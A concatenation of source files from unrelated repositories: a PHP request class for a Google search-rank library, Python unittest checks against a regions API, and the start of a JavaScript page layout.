use Marlemiesz\GoogleSearchResult\Proxy\ProxyInterface;
use Marlemiesz\GoogleSearchResult\Response\ResponseInterface;
class Request implements RequestInterface
{
private string $query;
private string $domain;
private ?string $location;
/**
* @var ?ProxyInterface
*/
private ?ProxyInterface $proxy;
/**
* @var ResponseInterface
*/
private ResponseInterface $response;
/**
* Request constructor.
* @param string $query
* @param ResponseInterface $response
* @param string $domain
* @param ?ProxyInterface $proxy
* @param string|null $location
*/
public function __construct(string $query, ResponseInterface $response, string $domain = 'google.com', ?ProxyInterface $proxy = null, ?string $location = null)
{
$this->query = $query;
$this->domain = $domain;
$this->location = $location;
$this->proxy = $proxy;
$this->response = $response;
}
/**
* @return string|null
*/
public function getLocation(): ?string
{
return $this->location;
}
/**
* @param string|null $location
*/
public function setLocation(?string $location): void
{
$this->location = $location;
}
/**
* @return string
*/
public function getDomain(): string
{
return $this->domain;
}
/**
* @param string $domain
*/
public function setDomain(string $domain): void
{
$this->domain = $domain;
}
/**
* @return string
*/
public function getQuery(): string
{
return $this->query;
}
/**
* @param string $query
*/
public function setQuery(string $query): void
{
$this->query = $query;
}
/**
* @return ProxyInterface|null
*/
public function getProxy(): ?ProxyInterface
{
return $this->proxy;
}
/**
* @param ProxyInterface|null $proxy
*/
public function setProxy(?ProxyInterface $proxy): void
{
$this->proxy = $proxy;
}
/**
* @param int|null $rank
* @param string|null $error_message
* @return void
*/
public function setResponse(?int $rank, ?string $error_message = null): void
{
$this->response->setRank($rank, $error_message);
}
/**
* @return int
*/
public function getResponseRank(): ?int
{
return $this->response->getRank();
}
/**
* @return bool
*/
public function isResponseCorrect(): bool
{
return $this->response->getErrorMessage() !== null;
}
/**
* @return string|null
*/
public function getResponseError(): ?string
{
return $this->response->getErrorMessage();
}
}
|
4040e23a36cbc3fa6b383cf187875fd95f10570b
|
[
"PHP"
] | 14
|
PHP
|
marlemiesz/google-search-results
|
955238c9dcf62c9808a0b228f964147ac35d02fe
|
58c6a09a7a1c7423c9dc8d75780e732bf8d373a9
|
refs/heads/main
|
<repo_name>arzamastsevya/SDET-03<file_sep>/test07.py
import unittest
import json
from urllib import request
from urllib.parse import quote
from config import test_config
# {server_name}/{API_ver}/regions?q=
#
class TestCase(unittest.TestCase):
API_name = "regions"
query_param = "?q="
query_value = ""
#def setUp(self):
def test_case_07(self):
URL = test_config.server_name + "/" + test_config.API_ver + "/" + self.API_name + self.query_param + format(quote(self.query_value))
res = request.urlopen(URL, timeout=test_config.response_timeout)
body = json.loads(res.read().decode("utf8"))
assert body["error"], f"\n{URL}\nIncorrect error message"
assert body["error"]["id"], f"\n{URL}\nIncorrect error message"
assert body["error"]["message"]=="Параметр 'q' должен быть не менее 3 символов", f"\n{URL}\nIncorrect error message"
#def tearDown(self):
if __name__ == "__main__":
unittest.main()<file_sep>/config.py
class test_config:
server_name = "https://regions-test.2gis.com"
API_ver = "1.0"
response_timeout = 10<file_sep>/test14.py
import unittest
import json
from urllib import request
from urllib.parse import quote
from config import test_config
# {server_name}/{API_ver}/regions?page=1
# проверяет что города в выдаче на разных
# страницах не дублируются
class TestCase(unittest.TestCase):
API_name = "regions"
query_param = "?page="
query_value = "1"
#def setUp(self):
def test_case_14(self):
page = 1
body_2 = {"items":""}
while body_2["items"]!=[] or page>5:
URL_1 = test_config.server_name + "/" + test_config.API_ver + "/" + self.API_name + self.query_param + str(page)
res = request.urlopen(URL_1, timeout=test_config.response_timeout)
body_1 = json.loads(res.read().decode("utf8"))
#print(URL_1)
#print(body_1, "\n")
URL_2 = test_config.server_name + "/" + test_config.API_ver + "/" + self.API_name + self.query_param + str(page+1)
res = request.urlopen(URL_2, timeout=test_config.response_timeout)
body_2 = json.loads(res.read().decode("utf8"))
#print(URL_2)
#print(body_2, "\n")
if body_2["items"]!=[]:
for i in body_1["items"]:
#print(i, (i not in body_2["items"]))
assert i not in body_2["items"], f"\n{URL_1}\n{URL_2}\nDuplicated value\n{i}"
#print("\n")
page += 1
#def tearDown(self):
if __name__ == "__main__":
unittest.main()<file_sep>/test03.py
import unittest
import json
from urllib import request
from urllib.parse import quote
from config import test_config
# {server_name}/{API_ver}/regions?q=рск
# проверка поиска по валидной подстроке
class TestCase(unittest.TestCase):
API_name = "regions"
query_param = "?q="
query_value = "рск"
#def setUp(self):
def test_case_03(self):
URL = test_config.server_name + "/" + test_config.API_ver + "/" + self.API_name + self.query_param + format(quote(self.query_value))
res = request.urlopen(URL, timeout=test_config.response_timeout)
body = json.loads(res.read().decode("utf8"))
#print(body)
for i in body["items"]:
assert self.query_value.lower() or self.query_value.lower()[0].upper() in i["name"], f"\n{URL}\nNot found {self.query_value}"
#def tearDown(self):
if __name__ == "__main__":
unittest.main()<file_sep>/test20.py
import unittest
import json
from urllib import request
from urllib.error import HTTPError
from urllib.parse import quote
from config import test_config
# {server_name}/{API_ver}/regions?page_size=5
# проверяет что количество элементов соответствует
# значению параметра
class TestCase(unittest.TestCase):
API_name = "regions"
query_param = "?page_size="
query_value = "5"
#def setUp(self):
def test_case_20(self):
URL = test_config.server_name + "/" + test_config.API_ver + "/" + self.API_name + self.query_param + format(quote(self.query_value))
res = request.urlopen(URL, timeout=test_config.response_timeout)
body = json.loads(res.read().decode("utf8"))
assert str(len(body["items"])) == self.query_value, f"\n{URL}\nThe number of elements is not {self.query_value}"
#def tearDown(self):
if __name__ == "__main__":
unittest.main()<file_sep>/test10.py
import unittest
import json
from urllib import request
from urllib.parse import quote
from config import test_config
# {server_name}/{API_ver}/regions?country_code=ru
# параметр country_code=ru
class TestCase(unittest.TestCase):
API_name = "regions"
query_param = "?country_code="
query_value = "kg"
#def setUp(self):
def test_case_10(self):
page = 1
body={"items": ""}
while body["items"]!=[] or page > 5:
URL = test_config.server_name + "/" + test_config.API_ver + "/" + self.API_name + self.query_param + format(quote(self.query_value)) + "&page=" + str(page)
res = request.urlopen(URL, timeout=test_config.response_timeout)
body = json.loads(res.read().decode("utf8"))
page += 1
#print(URL)
#print(body, "\n")
for i in body["items"]:
#print(i["country"]["code"])
assert self.query_value.lower() == i["country"]["code"], f"Not found {self.query_value} \n {URL}"
#def tearDown(self):
if __name__ == "__main__":
unittest.main()<file_sep>/test01.py
import unittest
import json
from urllib import request
from config import test_config
# {server_name}/{API_ver}/regions
# проверка структуры данных в ответе
# проверка по умолчанию page_size=15
# проверка что "total" > 0
class TestCase(unittest.TestCase):
API_name = "regions"
#def setUp(self):
def test_case_01(self):
URL = test_config.server_name + "/" + test_config.API_ver + "/" + self.API_name
res = request.urlopen(URL, timeout=test_config.response_timeout)
body = json.loads(res.read())
items = len(body["items"])
assert items==15, f"\n{URL}\nNot correct number of items by default 15 but {items}"
assert body["total"]>0 , f"\n{URL}\nNo \"total\" in response"
assert "total" in body
assert "items" in body
assert "id" in body["items"][0]
assert "name" in body["items"][0]
assert "code" in body["items"][0]
assert "name" in body["items"][0]["country"]
assert "code" in body["items"][0]["country"]
#def tearDown(self):
if __name__ == "__main__":
unittest.main()<file_sep>/test19.py
import unittest
import json
from urllib import request
from urllib.error import HTTPError
from urllib.parse import quote
from config import test_config
# {server_name}/{API_ver}/regions?page=1
# проверяет что page=1 по умолчанию
class TestCase(unittest.TestCase):
API_name = "regions"
query_param = "?page="
query_value = "1"
#def setUp(self):
def test_case_19(self):
URL_01 = test_config.server_name + "/" + test_config.API_ver + "/" + self.API_name
#print(URL)
res = request.urlopen(URL_01, timeout=test_config.response_timeout)
body_01 = json.loads(res.read().decode("utf8"))
URL_02 = test_config.server_name + "/" + test_config.API_ver + "/" + self.API_name + self.query_param + format(quote(self.query_value))
#print(URL)
res = request.urlopen(URL_02, timeout=test_config.response_timeout)
body_02 = json.loads(res.read().decode("utf8"))
assert body_01 == body_02, f"\n{URL_01}\n{URL_02}\nРage 1 is not default"
#def tearDown(self):
if __name__ == "__main__":
unittest.main()
|
cfca36816f783f2b267514d758d7784250c9d531
|
[
"Python"
] | 8
|
Python
|
arzamastsevya/SDET-03
|
2c4c6a7a1defd29346c04823a7fa76766d287a78
|
e10357e7f4d14637a4b5ebae6c174c59782f1e82
|
refs/heads/master
|
<file_sep>import logging
from typing import Callable, Type, Dict, List, Tuple, Iterable
from asyncio import Queue, create_task, gather, run as async_run
logging.basicConfig(
format="%(asctime)s | %(levelname)s | %(name)s | "
"%(funcName)s | %(message)s"
)
logger = logging.getLogger("turbine")
# TODO Topology validation.
def identity(x):
return x
class Stop:
pass
class Fail(Stop):
def __init__(self, exc: Type[Exception], msg: str):
self.exc: Type[Exception] = exc
self.msg: str = msg
def raise_exc(self):
raise self.exc(self.msg)
class Turbine:
def __init__(self, debug=False):
# Entry point for loading the topology.
self.entry_point: Callable = None
# Map of channel names to their queues.
# Initialized within the event loop.
self._channels: Dict[str, Queue] = {}
# Map of channel to the number of running tasks.
# Used to shut the topology down.
self._channel_num_tasks: Dict[str, int] = {}
# List of tasks to be run.
# Used to start the tasks in the event loop.
self._tasks: List[Callable] = []
# Flag indicating the status of the topology.
# This is used to terminate loading.
self._topology_running: bool = False
# Entry point for the topology.
self._entry_point: Callable = None
if debug:
logger.setLevel("DEBUG")
logger.debug("Logger set to debug.")
def _log_topology_status(self):
queue_statuses = " | ".join(
[
f"{c}: {q._unfinished_tasks}/{q.qsize()}"
for c, q in self._channels.items()
]
)
queue_tasks = " | ".join(
[f"{c}: {n}" for c, n in self._channel_num_tasks.items()]
)
logger.debug(f"Queue statuses: {queue_statuses}.")
logger.debug(f"Queue tasks: {queue_tasks}.")
logger.debug(f"Topology running: {self._topology_running}.")
async def _fail_topology(self, fail: Fail) -> None:
for channel, queue in self._channels.items():
# This particular move is grimey. There's no "sanctioned" way to
# clear these queues so we have to rely on internal implementation.
queue._queue.clear() # type: ignore
queue._unfinished_tasks = 0 # type: ignore
self._topology_running = False
for _ in range(self._channel_num_tasks[channel]):
await queue.put(fail)
logger.debug(f"Queues cleared and fails placed.")
self._log_topology_status()
async def _stop_downstream(
self, downstream_channels: List[str], stopper: Stop
) -> None:
for channel in downstream_channels:
for _ in range(self._channel_num_tasks[channel]):
await self._channels[channel].put(stopper)
def _add_channels(self, channels: List[Tuple[str, int]]) -> None:
for channel, tasks in channels:
self._channel_num_tasks[channel] = tasks
async def _source(
self, outbound_channel: str, f: Callable, *args, **kwargs
) -> None:
if len(args) > 1 or not isinstance(args[0], Stop):
value = f(*args, **kwargs)
await self._channels[outbound_channel].put(value)
else:
await self._stop_downstream([outbound_channel], args[0])
def source(self, outbound_channel: str) -> Callable:
def decorator(f: Callable = identity) -> Callable:
async def entry_point(*args, **kwargs):
try:
await self._source(outbound_channel, f, *args, **kwargs)
except Exception as e:
logger.exception(f"Source got exception {e}.")
await self._fail_topology(Fail(type(e), str(e)))
self._entry_point = entry_point
return f
return decorator
async def _sink(self, inbound_channel: str, f: Callable) -> Stop:
inbound_queue = self._channels[inbound_channel]
while True:
value = await inbound_queue.get()
if isinstance(value, Stop):
logger.debug(f"Sink got a stop: {value}.")
inbound_queue.task_done()
self._channel_num_tasks[inbound_channel] -= 1
return value
else:
f(value)
inbound_queue.task_done()
def sink(self, inbound_channel: str, num_tasks: int = 1) -> Callable:
self._channel_num_tasks[inbound_channel] = num_tasks
self._add_channels([(inbound_channel, num_tasks)])
def decorator(f: Callable) -> Callable:
async def sink_task() -> Stop:
try:
return await self._sink(inbound_channel, f)
except Exception as e:
logger.exception("sink got an exception.")
fail = Fail(type(e), str(e))
self._channel_num_tasks[inbound_channel] -= 1
await self._fail_topology(fail)
return fail
for _ in range(num_tasks):
self._tasks.append(sink_task)
return f
return decorator
async def _run_tasks(self, seq: Iterable) -> None:
# First create the channels.
logger.debug("Creating channels.")
self._channels = {
c: Queue(maxsize=s) for c, s in self._channel_num_tasks.items()
}
# Create the tasks.
logger.debug("Launching tasks.")
running_tasks = [create_task(t()) for t in self._tasks]
self._topology_running = True
self._log_topology_status()
# Load the entry point.
for s in seq:
if self._topology_running:
await self._entry_point(s)
# Now stop the topology.
if self._topology_running:
await self._entry_point(Stop())
# Check the status of the completed tasks.
completed_tasks = await gather(*running_tasks)
for t in completed_tasks:
if isinstance(t, Fail):
t.raise_exc()
def run(self, seq: Iterable) -> None:
self._log_topology_status()
async_run(self._run_tasks(seq))
<file_sep>import pytest
from turbine import Turbine
def identity(x):
return x
@pytest.fixture
def topology():
return Turbine(debug=True)
def test_source_sink(topology):
@topology.source("input")
def identity(x):
return x
sinker = []
@topology.sink("input")
def sink(x):
sinker.append(x)
data = ["a", "b", "c"]
topology.run(data)
assert sinker == data
def test_source_sink_multitask(topology):
@topology.source("input")
def identity(x):
return x
sinker = []
@topology.sink("input", num_tasks=2)
def sink(x):
sinker.append(x)
data = ["a", "b", "c"]
topology.run(data)
assert sinker == data
def test_source_exception(topology):
@topology.source("input")
def oops(x):
raise ValueError("my bad")
@topology.sink("input")
def nope(x):
print(x)
data = ["it", "doesn't", "matter"]
with pytest.raises(ValueError) as e:
topology.run(data)
assert str(e) == "my bad"
def test_scatter(topology):
@topology.source("input")
def identity(x):
return x
sinker1 = []
sinker2 = []
@topology.scatter("input", ["output_1", "output_2"])
def scatter(x):
return x + "!"
@topology.sink("output_1")
def sink1(x):
sinker1.append(x)
@topology.sink("output_2")
def sink2(x):
sinker2.append(x)
data = ["a", "b", "c"]
topology.run(data)
truth = ["a!", "b!", "c!"]
assert truth == sinker1
assert truth == sinker2
def test_scatter_multitask(topology):
@topology.source("input")
def identity(x):
return x
sinker1 = []
sinker2 = []
@topology.scatter("input", ["output_1", "output_2"], num_tasks=2)
def scatter(x):
return x + "!"
@topology.sink("output_1", num_tasks=2)
def sink1(x):
sinker1.append(x)
@topology.sink("output_2")
def sink2(x):
sinker2.append(x)
data = ["a", "b", "c"]
topology.run(data)
truth = ["a!", "b!", "c!"]
assert truth == sinker1
assert truth == sinker2
def test_scatter_exception(topology):
@topology.source("input")
def identity(x):
return x
@topology.scatter("input", ["output_1", "output_2"])
def scatter(x):
raise ValueError("my bad")
@topology.sink("output_1")
def sink_1(x):
print(x)
@topology.sink("output_2")
def sink_2(x):
print(x)
data = ["it", "doesn't", "matter"]
with pytest.raises(ValueError) as e:
topology.run(data)
assert str(e) == "my bad"
def test_gather(topology):
topology.source("input")(identity)
@topology.scatter("input", ["scatter1", "scatter2"])
def scatter(x):
return x + "!"
@topology.gather(["scatter1", "scatter2"], "output")
def gather(x, y):
return " ".join([x, y])
sinker = []
@topology.sink("output")
def sink(x):
sinker.append(x)
data = ["a", "b", "c"]
topology.run(data)
truth = ["a! a!", "b! b!", "c! c!"]
assert truth == sinker
# @pytest.mark.skip("hangs")
def test_gather_exception(topology):
topology.source("input")(identity)
topology.scatter("input", ["sc1", "sc2"])(identity)
@topology.gather(["sc1", "sc2"], "output")
def fail(x, t):
raise ValueError("Oops")
topology.sink("sc1")(print)
topology.sink("sc2")(print)
data = ["I'm", "going", "to", "fail"]
with pytest.raises(ValueError) as e:
topology.run(data)
print(e)
assert str(e) == "Oops"
def test_select(topology):
topology.source("input")(identity)
@topology.select("input", {0: "evens", 1: "odds"}, lambda x: x % 2)
def selector(x):
return x + 1
even_sinker = []
@topology.sink("evens")
def sink_evens(x):
even_sinker.append(x)
odd_sinker = []
@topology.sink("odds")
def sink_odds(x):
odd_sinker.append(x)
data = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
truth_evens = [2, 4, 6, 8, 10]
truth_odds = [1, 3, 5, 7, 9]
topology.run(data)
assert truth_evens == even_sinker
assert truth_odds == odd_sinker
def test_select_default(topology):
topology.source("input")(identity)
topology.select(
"input",
{"a": "as", "b": "bs"},
lambda x: x[0],
default_outbound_channel="everything_else",
)(identity)
a_sinker = []
@topology.sink("as")
# a_sink ... get it?
def a_sink(a):
a_sinker.append(a)
b_sinker = []
@topology.sink("bs")
def b_sink(b):
b_sinker.append(b)
everything_else_sinker = []
@topology.sink("everything_else")
def everything_else_sink(everything_else):
everything_else_sinker.append(everything_else)
data = ["aaa", "bbb", "ccc", "ddd"]
a_sinker_truth = ["aaa"]
b_sinker_truth = ["bbb"]
everything_else_sinker_truth = ["ccc", "ddd"]
topology.run(data)
assert a_sinker_truth == a_sinker
assert b_sinker_truth == b_sinker
assert everything_else_sinker_truth == everything_else_sinker
@pytest.mark.skip("hangs")
def test_select_no_default(topology):
topology.source("input")(identity)
topology.select("input", {"a": "as", "b": "bs"}, lambda x: x[0],)(identity)
a_sinker = []
@topology.sink("as")
# a_sink ... get it?
def a_sink(a):
a_sinker.append(a)
b_sinker = []
@topology.sink("bs", num_tasks=1)
def b_sink(b):
b_sinker.append(b)
data = ["aaa", "bbb", "ccc", "ddd"]
with pytest.raises(ValueError):
topology.run(data)
<file_sep>from .turbine import Turbine
__all__ = ["Turbine"]
<file_sep>import pytest
from turbine.asyncio import Turbine
@pytest.fixture()
def topology():
return Turbine(debug=True)
def test_source_sink_single_task(topology):
topology.source("input")()
sinker = []
@topology.sink("input")
def sink_array(x):
sinker.append(x)
data = ["a", "b", "c"]
topology.run(data)
assert data == sinker
def test_source_sink_multi_task(topology):
topology.source("input")()
sinker = []
@topology.sink("input", num_tasks=3)
def sink_array(x):
sinker.append(x)
data = ["a", "b", "c", "d", "e"]
topology.run(data)
assert set(data) == set(sinker)
def test_source_sink_source_exception(topology):
@topology.source("input")
def fail(x):
raise ValueError("uh oh")
sinker = []
@topology.sink("input", num_tasks=3)
def sink(x):
sinker.append(x)
data = ["a", "b", "c", "d", "e"]
with pytest.raises(ValueError) as e:
topology.run(data)
assert "uh oh" == str(e.value)
def test_source_sink_sink_exception(topology):
topology.source("input")()
@topology.sink("input", num_tasks=3)
def sink(x):
raise ValueError("failure")
data = ["a", "b", "c", "d", "e"]
with pytest.raises(ValueError) as e:
topology.run(data)
assert "failure" == str(e.value)
<file_sep>from setuptools import setup, find_packages
setup(
name="turbine",
version="0.1.alpha1",
packages=find_packages(exclude=["tests", "scripts"]),
install_requires=[],
author="<NAME>",
)
<file_sep># Under Construction
Just experimenting for now.<file_sep>from turbine import Turbine
topology = Turbine(debug=True)
@topology.source("input")
def add_exclamation(input_str):
return input_str + "!"
@topology.scatter("input", ["output_1", "output_2"], num_tasks=1)
def moar_exclamations(input_str):
return input_str + "!!"
@topology.sink("output_1")
def print_val(val):
print(val)
@topology.sink("output_2", num_tasks=2)
def print_val2(val):
print(val.upper())
values = ["hello", "world"]
topology.run(values)
<file_sep>import logging
import asyncio
from asyncio import (
Queue,
create_task,
run as async_run,
gather as gather_tasks,
Task,
)
from typing import (
Callable,
List,
Iterable,
Dict,
Any,
Tuple,
TypeVar,
Type,
Union,
)
from itertools import repeat
logging.basicConfig(
format="%(asctime)s | %(levelname)s | %(name)s | "
"%(funcName)s | %(message)s"
)
logger = logging.getLogger("turbine")
# TODO Figure out how to implement union
# TODO Look into changing queue sizes to match num_tasks.
# TODO Implement select
# TODO Implement splatter
# TODO Implement spread
# TODO Implement collect
# TODO Docstring source
# TODO Docstring scatter
# TODO Docstring union
# TODO Docstring gather
# TODO Docstring select
# TODO Docstring splatter
# TODO Docstring spread
# TODO Docstring collect
# TODO Docstring sink
# TODO Test select
# TODO Test splatter
# TODO Test spread
# TODO Test collect
T = TypeVar("T")
class Stop:
pass
class Fail(Stop):
def __init__(self, exc: Type[Exception], msg: str):
self.exc = exc
self.msg = msg
def raise_exc(self):
raise self.exc(self.msg)
class Turbine:
def __init__(self, debug=False):
# Channel names gets added to as decorators are called.
self._channel_names: Dict[str, int] = {}
# Track the number of tasks associated with each channel so we know
# how many stops to send downstream. Otherwise, we'll block forever.
# Trust me. Trust. Me.
self._channel_num_tasks: Dict[str, int] = {}
# Map the channel aliases to a channel. This gets filled inside the
# event loop.
self._channels: Dict[str, asyncio.Queue] = {}
# This is how the topology gets loaded.
self._entry_point: Callable = None
self._tasks: List[Callable] = []
self._running_tasks: List[Task] = []
if debug:
logger.setLevel("DEBUG")
logger.debug("Logger set to debug.")
self._topology_running = None
async def _fail_topology(
self, fail_exc: Type[Exception], fail_msg: str
) -> None:
fail = Fail(fail_exc, fail_msg)
self._clear_queues()
self._topology_running = False
await self._send_stop(list(self._channels.keys()), fail)
return fail
async def _send_stop(
self, outbound_channels: List[str], stopper: Stop
) -> None:
for c in outbound_channels:
num_tasks = self._channel_num_tasks[c]
for _ in range(num_tasks):
# Only send a downstream stop if there's something to process
# it.
if self._channel_num_tasks[c] > 0:
logger.debug(f"Sending stop to {c}: {stopper}.")
await self._channels[c].put(stopper)
self._channel_num_tasks[c] -= 1
async def _stop_tasks(self) -> None:
logger.debug("Stopping tasks.")
logger.debug(f"Queue statuses: {self._queue_statuses()}.")
logger.debug(f"Task statuses - {self._task_statuses()}.")
tasks_done = await gather_tasks(
*self._running_tasks, return_exceptions=True
)
for t in tasks_done:
if isinstance(t, Fail):
t.raise_exc()
def _queue_statuses(self) -> str:
queue_statuses = [
f"{c}: {q._unfinished_tasks}/{q.qsize()}" # type: ignore
for c, q in self._channels.items()
]
return " | ".join(queue_statuses)
def _task_statuses(self) -> str:
task_statuses = [
f"{c}: {n}" for c, n in self._channel_num_tasks.items()
]
return " | ".join(task_statuses)
def _clear_queues(self) -> None:
for q in self._channels.values():
# So this is ... questionable. Have to ignore the type to get it
# to pass the checker because we shouldn't be reaching in for this.
# There is no other way to clear a queue.
q._queue.clear() # type: ignore
q._unfinished_tasks = 0 # type: ignore
logger.debug("Queues allegedly cleared.")
logger.debug(f"Queue statuses: {self._queue_statuses()}.")
logger.debug(f"Task statuses - {self._task_statuses()}.")
def _add_channels(self, channels: Iterable[Tuple[str, int]]) -> None:
for name, size in channels:
# This condition will apply to the entry point, which is set in the
# source function because that queue needs to be unbounded.
if name not in self._channel_names:
self._channel_names[name] = size
async def _source(
self, outbound_name: str, f: Callable, *args, **kwargs
) -> None:
if len(args) > 1 or not isinstance(args[0], Stop):
value = f(*args, **kwargs)
await self._channels[outbound_name].put(value)
else:
value = args[0]
logger.debug(f"Source received stop: {value}.")
logger.debug(f"Queue statuses - {self._queue_statuses()}.")
logger.debug(f"Task statuses - {self._task_statuses()}.")
await self._send_stop([outbound_name], value)
def source(self, outbound_name: str) -> Callable:
# Now do the real decorator.
def decorator(f: Callable) -> Callable:
async def entry_point(*args, **kwargs):
try:
await self._source(outbound_name, f, *args, **kwargs)
except Exception as e:
logger.exception(f"Source got exception {e}.")
await self._fail_topology(type(e), str(e))
# The entry point will get called with Turbine.run. We need this
# separate from other tasks because it's not an infinite loop.
# That's really the only difference between this decorator and the
# others ... no while True.
self._entry_point = entry_point
return f
return decorator
async def _scatter(
self, inbound_channel: str, outbound_channels: List[str], f: Callable,
) -> Stop:
while True:
input_value = await self._channels[inbound_channel].get()
if isinstance(input_value, Stop):
logger.debug(f"Scatter received stop: {input_value}.")
logger.debug(f"Queue statuses - {self._queue_statuses()}.")
logger.debug(f"Task statuses - {self._task_statuses()}.")
await self._send_stop(outbound_channels, input_value)
self._channels[inbound_channel].task_done()
return input_value
# Call the function on the inputs ...
output = f(input_value)
# ... and copy the outputs to each of the outbound channels.
for output, channel in zip(repeat(output), outbound_channels):
await self._channels[channel].put(output)
self._channels[inbound_channel].task_done()
def scatter(
self,
inbound_channel: str,
outbound_channels: List[str],
num_tasks: int = 1,
) -> Callable:
# Add the inbound channels to the channel map.
self._add_channels([(inbound_channel, 1)])
self._channel_num_tasks[inbound_channel] = num_tasks
def decorator(f: Callable) -> Callable:
# Create the async task that applies the function.
async def task() -> Stop:
try:
return await self._scatter(
inbound_channel, outbound_channels, f
)
except Exception as e:
logger.exception(f"Scatter got exception {e}.")
fail = Fail(type(e), str(e))
self._channel_num_tasks[inbound_channel] -= 1
logger.debug(f"Task statuses - {self._task_statuses()}.")
return await self._fail_topology(type(e), str(e))
# We need to restart the function so the topology is
# repaired. This ensures the failure is appropriately
# propagated.
# return await self._scatter(
# inbound_channel, outbound_channels, f
# )
# Create all of the tasks.
for _ in range(num_tasks):
self._tasks.append(task)
return f
return decorator
def union(self):
pass # ! This is a tough one. In Clojure I used alts!!.
async def _gather(
self, inbound_channels: List[str], outbound_channel: str, f: Callable
) -> Stop:
while True:
values = []
stop: Union[Stop, None] = None
# Read off the inbound channels sequentially.
for c in inbound_channels:
v = await self._channels[c].get()
if not isinstance(v, Stop):
values.append(v)
else:
stop = v
break # Stop means stop.
# Determine if a stop came from any of the inbound channels and
# send the stop message along.
if stop:
logger.debug(f"Gather received stop: {stop}.")
logger.debug(f"Queue statuses - {self._queue_statuses()}.")
logger.debug(f"Task statuses - {self._task_statuses()}.")
await self._send_stop([outbound_channel], stop)
for c in inbound_channels:
self._channels[c].task_done()
return stop
# If we don't stop, apply the function and send the result
# downstream.
output = f(*values)
await self._channels[outbound_channel].put(output)
for c in inbound_channels:
self._channels[c].task_done()
def gather(
self,
inbound_channels: List[str],
outbound_channel: str,
num_tasks: int = 1,
) -> Callable:
self._add_channels(zip(inbound_channels, repeat(1)))
for inbound_name in inbound_channels:
self._channel_num_tasks[inbound_name] = num_tasks
def decorator(f: Callable) -> Callable:
# Create the async task that applies the function.
async def task():
try:
return await self._gather(
inbound_channels, outbound_channel, f
)
except Exception as e:
logger.exception(f"Gather got an exception: {e}.")
fail = Fail(type(e), str(e))
for inbound_channel in inbound_channels:
self._channel_num_tasks[inbound_channel] -= 1
logger.debug(f"Task statuses - {self._task_statuses()}.")
return await self._fail_topology(type(e), str(e))
# Create the tasks.
for _ in range(num_tasks):
self._tasks.append(task)
return f
return decorator
def select(
self,
inbound_channel: str,
outbound_channels: Dict[T, str],
selector_fn: Callable[[Any], T],
default_outbound_channel: str = None,
num_tasks: int = 1,
) -> Callable:
def decorator(f: Callable) -> Callable:
all_outbound_channels = list(outbound_channels.values())
if default_outbound_channel:
all_outbound_channels.append(default_outbound_channel)
self._add_channels([(inbound_channel, 1)])
self._channel_num_tasks[inbound_channel] = num_tasks
# Create the async task that executes the function.
async def task():
while True:
value = await self._channels[inbound_channel].get()
if isinstance(value, Stop):
logger.debug(f"Selector got a stop {value}.")
for c in all_outbound_channels:
await self._channels[c].put(value)
self._channels[inbound_channel].task_done()
return value
output = f(value)
selector_value = selector_fn(output)
if (
selector_value not in outbound_channels
and default_outbound_channel
):
# selector value is not in the outbound channel map,
# put on default.
await self._channels[default_outbound_channel].put(
output
)
elif selector_value not in outbound_channels:
# selector value is not in the outbound channel map and
# there isn't a default outbound channel.
fail = Fail(
ValueError,
f"No selector value for {selector_value}.",
)
self._clear_queues()
await self._entry_point(fail)
else:
# selector value is in the outbound channel map, put
# the value on that channel.
await self._channels[
outbound_channels[selector_value]
].put(output)
self._channels[inbound_channel].task_done()
for _ in range(num_tasks):
self._tasks.append(task)
return f
return decorator
def splatter(self):
pass
def spread(self):
pass
def task(self):
# This is a one-in one-out route.
# It's for parallelizing workloads.
pass
def collect(self):
pass
def sink(self, inbound_name: str, num_tasks: int = 1) -> Callable:
self._channel_num_tasks[inbound_name] = num_tasks
self._add_channels([(inbound_name, 1)])
def decorator(f: Callable) -> Callable:
async def task():
while True:
value = await self._channels[inbound_name].get()
if isinstance(value, Stop):
logger.debug(f"Sinker received stop: {value}.")
self._channels[inbound_name].task_done()
self._channel_num_tasks[inbound_name] -= 1
logger.debug(
f"Queue statuses - {self._queue_statuses()}."
)
logger.debug(
f"Task statuses - {self._task_statuses()}."
)
return value
f(value)
self._channels[inbound_name].task_done()
# Create the tasks for the sinks.
for _ in range(num_tasks):
self._tasks.append(task)
return f
return decorator
async def _run_tasks(self, seq: Iterable) -> None:
# Create the queues inside the event loop attached to `run`.
self._channels = {
c: Queue(maxsize=s) for c, s in self._channel_names.items()
}
# Load the tasks into the loop.
self._running_tasks = [create_task(t()) for t in self._tasks]
self._topology_running = True
# Load the entry point queue.
for s in seq:
if self._topology_running:
await self._entry_point(s)
if self._topology_running:
await self._entry_point(Stop())
logger.debug(f"Queue statuses: {self._queue_statuses()}.")
# Now shut the tasks down.
await self._stop_tasks()
def run(self, seq: Iterable) -> None:
queue_sizes = " | ".join(
[f"{q}: {n}" for q, n in self._channel_names.items()]
)
num_tasks = " | ".join(
[f"{q}: {n}" for q, n in self._channel_num_tasks.items()]
)
logger.debug(f"Queue sizes: {queue_sizes}.")
logger.debug(f"Task concurrencies: {num_tasks}.")
async_run(self._run_tasks(seq), debug=True)
|
c55aa158f87965cf4806e7acc31fec030dfc5bc3
|
[
"Markdown",
"Python"
] | 8
|
Python
|
timothyrenner/turbine-py
|
b0af24022e53832b7c001d7e9ef4aa04a7a4ef88
|
c57b0ec3611f74756885eb55e7ece8119e434ccd
|
refs/heads/master
|
<repo_name>suspha/speria-creative<file_sep>/app/layouts/default.js
module.exports = async function ($) {
const host =
process.env.NODE_ENV == 'production'
? 'https://speria.no/api'
: 'http://localhost:5000'
function init() {
var links = document.querySelectorAll('a.langlink')
links.forEach(function (a) {
if (a.pathname == location.pathname) {
a.classList.add('active-link')
}
})
}
return /* html */ `
<!doctype html>
<html lang="${$.lang}">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="msvalidate.01" content="4ABA947BA0D78F4F16C67C0B46BB917E">
<meta name="description" content="Profesjonell Webdesign og webutvikling, SEO Søkemotoroptimalisering og Markedsføring, billig og rimelig Hosting og Drift">
<title>${$.page.title || 'Speria Creative'}</title>
${$.style('/bundle.css')}
<link href="/img/favicon.png" rel="shortcut icon">
<link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Raleway:wght@300;400;500&display=swap" rel="stylesheet">
${$.script('/bundle.js')}
<script>window.api = waveorb('${host}')</script>
<script async defer data-domain="speria.no" src="https://plausible.io/js/plausible.js"></script>
